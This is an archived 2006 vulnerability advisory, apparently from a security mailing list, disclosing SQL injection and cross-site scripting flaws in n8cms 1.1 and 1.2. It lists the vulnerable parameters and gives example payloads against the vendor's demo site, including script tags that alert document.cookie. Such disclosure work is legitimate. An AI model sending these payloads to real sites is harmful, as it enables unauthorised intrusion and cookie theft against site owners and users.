Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA19019] StoreBot 2005 Professional Edition "Pwd" SQL Injection

  [SA19060] StoreBot 2002 Standard Edition "ShipMethod"
Script Insertion

  [SA19039] PunBB "header.
php" Cross-Site Scripting Vulnerability

  [SA19061] MyBB "comma" Parameter SQL Injection Vulnerability

From::) :) <liz0_(at)_bsdmail.com>
Date:28.02.2006
Subject:n8cms 1.1 & 1.2 version Sql Эnjection And XSS

-----------------------------------------------------------------
n8cms 1.1 & 1.2  version

Sql İnjection And XSS

Site:http://www.nathanlandry.com

Demo:http://www.nathanlandry.com/n8cms_v1.1/

Credit : Liz0ziM
webpage:www.biyosecuerity.com
Mail   :liz0@bsdmail.com

--------------------------------------------------------------------

1)Sql İnjection


http://[target]/path/?dir=[sql]

http://[target]/path/?dir=home&page_id=[sql]

2)Xss [ Cross Site Scripting ]

http://[target]/path/?dir=[xss]

http://[target]/path/?dir=home&page_id=[xss]

http://[target]/path/mailto.php?userid=[xss]


---------------------------------------------------------------------
example:

Sql:

http://www.nathanlandry.com/n8cms_v1.1/?dir=home&page_id='
http://www.nathanlandry.com/n8cms_v1.1/?dir='

Xss:

http://www.nathanlandry.com/n8cms_v1.1/?dir="><script>alert(doc
ument.cookie)</script>
http://www.nathanlandry.com/n8cms_v1.1/?dir="><script>alert(/Bi
yoSecurityTeam/)</script>
http://www.nathanlandry.com/n8cms_v1.1/?dir=home&page_id="><script
>alert(/BiyoSecurityTeam/)</script>
http://www.nathanlandry.com/n8cms_v1.1/mailto.php?userid="><script>
alert(/BiyoSecurityTeam/)</script>





----------------------------------------------------------------------

Source:

http://www.blogcu.com/Liz0ziM/307940/

http://biyosecurity.be/bugs/n8cms.txt




--
_______________________________________________
Get your free email from http://mymail.bsdmail.com

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server